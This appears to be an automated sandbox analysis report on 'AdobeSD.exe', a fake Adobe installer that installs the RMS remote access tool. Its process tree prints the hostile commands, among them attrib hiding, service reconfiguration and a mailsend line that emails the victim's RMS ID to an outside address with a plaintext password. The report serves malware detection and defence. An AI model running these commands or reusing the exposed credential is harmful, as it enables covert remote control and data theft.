Analysis
-
max time kernel
147s -
max time network
147s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
01-03-2021 18:15
General
-
Target
AdobeSD.exe
-
Size
5.0MB
-
MD5
24cae17860a840c0317018ef3d607e94
-
SHA1
7595283fd24ebae9f95ea80209d674ca9bd2afcc
-
SHA256
7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c
-
SHA512
bdfe1b899ef55a0ae793e672c190d79161899179d98b0577b5ceda8f02c66376ca0d366c0f087dbb043d30c7ec41a39b0cd2fcc6be4d66639777c6430db3ee82
Malware Config
Signatures
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Executes dropped EXE 8 IoCs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 27 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 2 IoCs
-
Kills process with taskkill 4 IoCs
-
Runs .reg file with regedit 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 8 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\AdobeSD.exe"C:\Users\Admin\AppData\Local\Temp\AdobeSD.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files\Adobe\AdobeAcrobat\install.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat"3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\*.*"3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs\*.*"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rfusclient.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rutserv.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Acrobat-XI.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im AdobeFP.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc delete AdobeReader3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Hardware Driver\LocalDisk" /f3⤵
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /silentinstall3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /firewall3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Program Files\Adobe\AdobeAcrobat\regedit.reg"3⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\sc.exesc failure AdobeReader reset= 0 actions= restart/1000/restart/1000/restart/10003⤵
-
C:\Windows\SysWOW64\sc.exesc config AdobeReader obj= LocalSystem type= interact type= own3⤵
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /start3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\reg.exereg export "HKLM\SYSTEM\Hardware Driver\LocalDisk\v4\Server\Parameters" "IT.txt"3⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
-
C:\Program Files\Adobe\AdobeAcrobat\mailsend.exemailsend.exe -t zik.sup@bk.ru -attach IT.txt,application/txt -sub "RMS ID" -smtp smtp.mail.ru -port 465 -f zik.sup@bk.ru -name "RMS ToktonIT" -ssl -auth-login -user zik.sup@bk.ru -pass hT*euyAyCT43 -q3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\attrib.exeattrib "regedit.reg" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "install.bat" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "IT.txt" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib "mailsend.exe" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exeMD5
d503b890a8a662f8510f7c15be329f31
SHA1ecad117d1ca7be14e91f93095e87d08f4e11770a
SHA256c5e786e10ef3cda75ec5851afa321180821a2994b9c2813b0a1b70825917ccf6
SHA512374a92556e1beb6216bb6e3a0cb28f88a5f6231fb217e8595e40b86e936036cfdb58e070e85c6d3ff4735b113fcabb56e626a51d0886e5a3461196f37f0be866
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exeMD5
d503b890a8a662f8510f7c15be329f31
SHA1ecad117d1ca7be14e91f93095e87d08f4e11770a
SHA256c5e786e10ef3cda75ec5851afa321180821a2994b9c2813b0a1b70825917ccf6
SHA512374a92556e1beb6216bb6e3a0cb28f88a5f6231fb217e8595e40b86e936036cfdb58e070e85c6d3ff4735b113fcabb56e626a51d0886e5a3461196f37f0be866
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exeMD5
d503b890a8a662f8510f7c15be329f31
SHA1ecad117d1ca7be14e91f93095e87d08f4e11770a
SHA256c5e786e10ef3cda75ec5851afa321180821a2994b9c2813b0a1b70825917ccf6
SHA512374a92556e1beb6216bb6e3a0cb28f88a5f6231fb217e8595e40b86e936036cfdb58e070e85c6d3ff4735b113fcabb56e626a51d0886e5a3461196f37f0be866
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exeMD5
d503b890a8a662f8510f7c15be329f31
SHA1ecad117d1ca7be14e91f93095e87d08f4e11770a
SHA256c5e786e10ef3cda75ec5851afa321180821a2994b9c2813b0a1b70825917ccf6
SHA512374a92556e1beb6216bb6e3a0cb28f88a5f6231fb217e8595e40b86e936036cfdb58e070e85c6d3ff4735b113fcabb56e626a51d0886e5a3461196f37f0be866
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exeMD5
36960b2c933dd8a0d7f8b78f761d2521
SHA1636050040deede91b65bac0d93fd86cc89b156a9
SHA256e5d26ea508f0b32fa82c2e8ed8a3b092cff8d033b23169ca8820b896f6bfdb9a
SHA51250bd1519a784660c12238283027569318dc5908752f33064f888f8f4762f27a746ba724e81dd54dc2d98002d423c113f893aa9d4bb2e66e0c37b5e65fc034793
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exeMD5
36960b2c933dd8a0d7f8b78f761d2521
SHA1636050040deede91b65bac0d93fd86cc89b156a9
SHA256e5d26ea508f0b32fa82c2e8ed8a3b092cff8d033b23169ca8820b896f6bfdb9a
SHA51250bd1519a784660c12238283027569318dc5908752f33064f888f8f4762f27a746ba724e81dd54dc2d98002d423c113f893aa9d4bb2e66e0c37b5e65fc034793
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exeMD5
36960b2c933dd8a0d7f8b78f761d2521
SHA1636050040deede91b65bac0d93fd86cc89b156a9
SHA256e5d26ea508f0b32fa82c2e8ed8a3b092cff8d033b23169ca8820b896f6bfdb9a
SHA51250bd1519a784660c12238283027569318dc5908752f33064f888f8f4762f27a746ba724e81dd54dc2d98002d423c113f893aa9d4bb2e66e0c37b5e65fc034793
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exeMD5
36960b2c933dd8a0d7f8b78f761d2521
SHA1636050040deede91b65bac0d93fd86cc89b156a9
SHA256e5d26ea508f0b32fa82c2e8ed8a3b092cff8d033b23169ca8820b896f6bfdb9a
SHA51250bd1519a784660c12238283027569318dc5908752f33064f888f8f4762f27a746ba724e81dd54dc2d98002d423c113f893aa9d4bb2e66e0c37b5e65fc034793
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exeMD5
36960b2c933dd8a0d7f8b78f761d2521
SHA1636050040deede91b65bac0d93fd86cc89b156a9
SHA256e5d26ea508f0b32fa82c2e8ed8a3b092cff8d033b23169ca8820b896f6bfdb9a
SHA51250bd1519a784660c12238283027569318dc5908752f33064f888f8f4762f27a746ba724e81dd54dc2d98002d423c113f893aa9d4bb2e66e0c37b5e65fc034793
-
C:\Program Files\Adobe\AdobeAcrobat\IT.txtMD5
65897363fd922e18fe1da20fe7b7aa3f
SHA10c071dbc51a167820e42faa998aff0a24ef2eaad
SHA256b757bacaf3721d6202e3e1b11f26480a2798781e0251889103be5f572ea3312f
SHA512bbc2de4fafb8c1e53f93682001cdddc44b1e75cf27174a9209be97a4349a0da80e6e7318c6c8569e6723150ec25ced7dc3dada79fb873e8e9f024287ae31e903
-
C:\Program Files\Adobe\AdobeAcrobat\install.batMD5
6755b49f34a6754bd63e856a4d2ba55c
SHA1697eff97f486dff0365f7524e94d885e134643dc
SHA256c0aa0ed05f4056a42bd651d0e5cf73222f91a97dc7982d399357cd87a7c723e8
SHA512a1df37c283e069b731dc95d857543839ae3affab0205451efd337fcc9abe89c41bb8476aa349f6552954fac0d4785dad25f846e64c5f16fe06c6d27c5a8d4adb
-
C:\Program Files\Adobe\AdobeAcrobat\mailsend.exeMD5
ac23b87f8ec60ddd3f555556f89a6af8
SHA13cea6f84757d15ee8d7fa19d3dfc4992c50aa90c
SHA25680a1d0a15066c7af67cf5377e59e450c2a96018505236f8f3352173282b27ae4
SHA51257e67eab9c2a3b94161500eb0091533a539454e9bfddd47c61477299de9455b7ca11c498c5d8a7d77f4763a2053acb4ff96868a9313fede29969edc16d35b167
-
C:\Program Files\Adobe\AdobeAcrobat\mailsend.exeMD5
ac23b87f8ec60ddd3f555556f89a6af8
SHA13cea6f84757d15ee8d7fa19d3dfc4992c50aa90c
SHA25680a1d0a15066c7af67cf5377e59e450c2a96018505236f8f3352173282b27ae4
SHA51257e67eab9c2a3b94161500eb0091533a539454e9bfddd47c61477299de9455b7ca11c498c5d8a7d77f4763a2053acb4ff96868a9313fede29969edc16d35b167
-
C:\Program Files\Adobe\AdobeAcrobat\regedit.regMD5
72344861e4f61574a9ca9aba1ce870d0
SHA111516660ef7edce57b5674643df666ec662dfa6b
SHA256befb655c4731c7a91de7b1aa5e5401519021dabbcef6b895240eefed27e35649
SHA5129b41fa86a7ed7dbcfd7c4b95be5002e04dbf47cd64814c0c55e8305ee48fb0697607527ef6d755391f592bd3062675c886ff4484cbcaaa7c156826ed70bf308e
-
C:\Program Files\Adobe\AdobeAcrobat\vp8decoder.dllMD5
d43fa82fab5337ce20ad14650085c5d9
SHA1678aa092075ff65b6815ffc2d8fdc23af8425981
SHA256c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b
SHA512103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d
-
C:\Program Files\Adobe\AdobeAcrobat\vp8encoder.dllMD5
dab4646806dfca6d0e0b4d80fa9209d6
SHA18244dfe22ec2090eee89dad103e6b2002059d16a
SHA256cb6ef96d3a66ef08ec2c8640b751a52d6d4f4530cf01162a69966f0fd5153587
SHA512aa5eb93bf23a10de797d6fb52a55a95d36bc48927c76fedd81e0c48872745cb7f7d1b3f230eaae42fd4e79b6a59ca707e56bd6963b03644cbd5984f11e98d6e7
-
C:\Program Files\Adobe\AdobeAcrobat\webmmux.dllMD5
9581f7064028a782182e8a4411e9afa5
SHA19356d9f62fc38a1150c3cad556b2a531cd7d430b
SHA256320a23db8d34bd2628078903d4496d4b9320d50c13d11283f77a8c3b9ec36698
SHA51201c5a711bd0d7cea5cae906c163b7a98c3b09b8ce5a5b52f096d806e20d7f28fe3e174eb6ba8ff630b870b1cea3d9d72905227a989d70e312d79b55644e6442c
-
C:\Program Files\Adobe\AdobeAcrobat\webmvorbisdecoder.dllMD5
ec59d88c3ebda7c2ce36dcdbe4c67e5b
SHA18b01a5730ebda5729a57d97abec1de00c7cf0218
SHA25654b661f2d55f5cafccd7aca334efb89e908b3f19e3e35c9aa661221b31ec60e3
SHA51246963b390affcb1f6e5d42ae4f4a67a453d9048e8f8b825bb543a1c2031f1ece07d2f295d30eff51a6624bf096e0d10f8ba8d6516b28e63926f214eb7d7e5b84
-
C:\Program Files\Adobe\AdobeAcrobat\webmvorbisencoder.dllMD5
12eba58e4c0450ccb2d9fdce22255d09
SHA11f88ce0834e0bcf0f61ed0557204ef05dd577b1e
SHA256c80464f71b46411b01962b6095acd6eb2ed09ad8d6eb0a67840826a6297823b2
SHA51208f999aeb55968de3dacb560a25174e5a1c29eb2ea95a6fc8f770c10369263e2f8cea525f93c89a0e03954ff1221b4486641fc9a892d53a8857e9cf441ec05d4
-
memory/196-46-0x0000000000A40000-0x0000000000A41000-memory.dmpFilesize
4KB
-
memory/196-41-0x0000000000000000-mapping.dmp
-
memory/196-47-0x0000000002D40000-0x0000000002D41000-memory.dmpFilesize
4KB
-
memory/196-49-0x0000000003540000-0x0000000003541000-memory.dmpFilesize
4KB
-
memory/200-48-0x0000000000B20000-0x0000000000B21000-memory.dmpFilesize
4KB
-
memory/200-43-0x0000000000000000-mapping.dmp
-
memory/420-15-0x0000000000000000-mapping.dmp
-
memory/492-156-0x0000000000000000-mapping.dmp
-
memory/1000-21-0x0000000000000000-mapping.dmp
-
memory/1068-45-0x0000000000000000-mapping.dmp
-
memory/1412-22-0x0000000000000000-mapping.dmp
-
memory/1488-33-0x0000000000000000-mapping.dmp
-
memory/1500-20-0x0000000000000000-mapping.dmp
-
memory/1680-2-0x0000000000000000-mapping.dmp
-
memory/2000-18-0x0000000000000000-mapping.dmp
-
memory/2092-54-0x0000000000000000-mapping.dmp
-
memory/2120-50-0x0000000000000000-mapping.dmp
-
memory/2120-52-0x00000000009C0000-0x00000000009C1000-memory.dmpFilesize
4KB
-
memory/2632-32-0x0000000000C00000-0x0000000000C01000-memory.dmpFilesize
4KB
-
memory/2632-29-0x0000000000000000-mapping.dmp
-
memory/2676-17-0x0000000000000000-mapping.dmp
-
memory/2728-40-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/3092-5-0x0000000000000000-mapping.dmp
-
memory/3160-4-0x0000000000000000-mapping.dmp
-
memory/3496-155-0x0000000000000000-mapping.dmp
-
memory/3548-19-0x0000000000000000-mapping.dmp
-
memory/3580-39-0x0000000000B30000-0x0000000000B31000-memory.dmpFilesize
4KB
-
memory/3580-36-0x0000000000000000-mapping.dmp
-
memory/3640-58-0x0000000002A90000-0x0000000002A91000-memory.dmpFilesize
4KB
-
memory/3640-59-0x0000000003290000-0x0000000003291000-memory.dmpFilesize
4KB
-
memory/3640-55-0x0000000000000000-mapping.dmp
-
memory/3640-70-0x0000000002A90000-0x0000000002A91000-memory.dmpFilesize
4KB
-
memory/3640-60-0x0000000002A90000-0x0000000002A91000-memory.dmpFilesize
4KB
-
memory/3644-34-0x0000000000000000-mapping.dmp
-
memory/3696-35-0x0000000000000000-mapping.dmp
-
memory/3836-154-0x0000000000000000-mapping.dmp
-
memory/3840-26-0x0000000003710000-0x0000000003711000-memory.dmpFilesize
4KB
-
memory/3840-31-0x0000000000BC0000-0x0000000000BC1000-memory.dmpFilesize
4KB
-
memory/3840-27-0x0000000002F10000-0x0000000002F11000-memory.dmpFilesize
4KB
-
memory/3840-23-0x0000000000000000-mapping.dmp
-
memory/3840-25-0x0000000002F10000-0x0000000002F11000-memory.dmpFilesize
4KB
-
memory/3972-157-0x0000000000000000-mapping.dmp
-
memory/4056-16-0x0000000000000000-mapping.dmp
-
memory/4068-53-0x0000000000000000-mapping.dmp